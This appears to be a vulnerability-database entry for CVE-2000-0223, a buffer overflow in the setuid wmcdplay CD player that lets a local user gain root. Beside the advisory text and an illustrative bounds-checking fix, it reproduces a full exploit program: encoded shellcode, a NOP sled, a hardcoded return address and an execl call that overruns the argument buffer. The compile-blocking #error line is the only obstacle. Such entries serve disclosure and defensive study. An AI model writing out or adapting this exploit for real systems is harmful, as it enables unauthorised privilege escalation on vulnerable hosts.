wmcdplay Buffer Overflow Vulnerability

Vulnerability ID: 1105747    Vulnerability type: Buffer overflow
Published: 2000-03-11    Updated: 2005-05-02
CVE ID: CVE-2000-0223
CNNVD ID: CNNVD-200003-021
Platform: Linux    CVSS score: 7.2
| Vulnerability source
https://www.exploit-db.com/exploits/19802
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-021
| Vulnerability details
A buffer overflow vulnerability exists in wmcdplay, the CD player program for the WindowMaker desktop. A local user can gain root privileges by supplying an overly long argument.
| Exploit (EXP)
source: http://www.securityfocus.com/bid/1047/info

wmcdplay is a CD player generally used with the WindowMaker X11 window manager on Unix systems. While wmcdplay is rarely installed by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to a lack of bounds checking on an argument it is passed. As a result, a local user can elevate their privileges to root by overrunning the stack and executing arbitrary code with the effective user-id of the process (root).
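The bug class described above, an unchecked copy of a command-line argument into a fixed-size stack buffer, shown beside a bounds-checked replacement. This is an added illustration, not code from wmcdplay, from the advisory, or from the exploit below; the 256-byte buffer size is taken from the exploit's own comment, and the function names, the program structure and the sample argument are assumptions made for this example.

```c
/* Added example: vulnerable argument handling next to a hardened version.
 * Not wmcdplay's code; FILENAME_BUF (256) follows the exploit's comment,
 * everything else here is an assumption for illustration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define FILENAME_BUF 256

/* Vulnerable pattern: strcpy() copies until it finds the NUL terminator and
 * never looks at how much room dst has. An argument longer than
 * FILENAME_BUF - 1 bytes overwrites whatever follows the buffer on the stack
 * (saved frame pointer, return address), which is exactly what the
 * advisory describes. Never call this with untrusted input. */
void set_filename_unchecked(char *dst, const char *arg)
{
	strcpy(dst, arg); /* BUG: no length check against the destination size */
}

/* Hardened replacement: measure the argument against the destination size
 * first, refuse anything that does not fit (rather than silently
 * truncating), and always leave dst NUL-terminated.
 * Returns 0 on success, -1 if the argument was rejected. */
int set_filename_checked(char *dst, size_t dstlen, const char *arg)
{
	size_t n = 0;

	if (dstlen == 0)
		return -1;
	/* Bounded scan: stop as soon as we know the argument cannot fit. */
	while (n < dstlen && arg[n] != '\0')
		n++;
	if (n >= dstlen) {
		dst[0] = '\0';
		return -1; /* too long: would overflow dst */
	}
	memcpy(dst, arg, n + 1); /* n bytes plus the terminating NUL */
	return 0;
}

/* Helper for tests: builds a constructed argument of arg_len 'A' bytes and
 * returns what set_filename_checked() decides for it (0 accept, -1 reject).
 * Returns -2 if arg_len exceeds the helper's own scratch buffer. */
int checked_result_for_length(size_t arg_len)
{
	char arg[1024];
	char dst[FILENAME_BUF];

	if (arg_len >= sizeof(arg))
		return -2;
	memset(arg, 'A', arg_len);
	arg[arg_len] = '\0';
	return set_filename_checked(dst, sizeof(dst), arg);
}

int main(int argc, char **argv)
{
	char filename[FILENAME_BUF];
	/* Constructed default so the program runs with no arguments. */
	const char *arg = argc > 1 ? argv[1] : "example-track.wav";

	if (set_filename_checked(filename, sizeof(filename), arg) != 0) {
		fprintf(stderr, "filename argument too long (max %d bytes)\n",
			FILENAME_BUF - 1);
		return 1;
	}
	printf("using filename: %s\n", filename);
	return 0;
}
```

The checked version rejects any argument of 256 or more bytes, so the 255-byte maximum matches the buffer size minus the terminator; in a setuid program the rejection path matters more than a friendly error, because the process is acting with the invoking user's input and root's privileges at the same time.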

/*** Halloween 4 local root exploit for wmcdplay. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL. 
 *** 
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** This exploit was made (possible by|for) the team TESO and CyberPsychotic, the
 *** OpenBSD-freak. :-) Greets to all our friends. You know who you are.
 *** 
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include <stdio.h>
#include <string.h>	/* memset, strlen */
#include <stdlib.h>	/* atoi */
#include <unistd.h>	/* execl */
/* string.h, stdlib.h and unistd.h are not in the original listing; they are
 * added here so the file compiles on current toolchains, which no longer accept
 * implicit function declarations. */

/* The shellcode can't contain '/' as wmcdplay will exit then.
 * So i used Stealth's INCREDIBLE hellkit to generate these code! :-)
 */
char shell[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x68\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xbb\x11"
"\x01\x01\x8c\xba\x2b\xee\xfe\xfe\x30\xd3\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c"
"\xf9\xb9\x16\x01\x01\x01\x88\xd7\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\x88\xed\x5c\xc2\x91\x91\x91"
"\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91";

/* filename-buffer plus ret + ebp - defaultpath
 */
#define buflen (256+8 - 28)
#error "no kids please"

int main(int argc, char **argv)
{
	char *wm[] = {
		"/usr/X11R6/bin/wmcdplay",
		"-f",
		"-display", "0:0", /* one might comment this if already running on X; remotely you can
				    * give your own server
				    */
		0
	};

	char boom[buflen+10];
	int i = 0, j = 0, ret =  0xbffff796;	/* this address works for me */

	memset(boom, 0, sizeof(boom));
	memset(boom, 0x90, buflen);		/* NOP sled */
	if (argc > 1)
		ret += atoi(argv[1]);
	else
		printf("You can also add an offset to the commandline. 40 worked for me on the console.\n");
	/* place the shellcode at the end of the sled, just before the return address */
	for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
		boom[i] = shell[j++];
	*(long*)(&boom[i]) = ret;

	printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
	       "Respect other users privacy!\n");

	execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0);
	return 0;
}
| References

Source: BID
Name: 1047
Link: http://www.securityfocus.com/bid/1047
Source: BUGTRAQ
Name: 20000311 TESO advisory - wmcdplay
Link: http://archives.neohapsis.com/archives/bugtraq/2000-03/0107.html
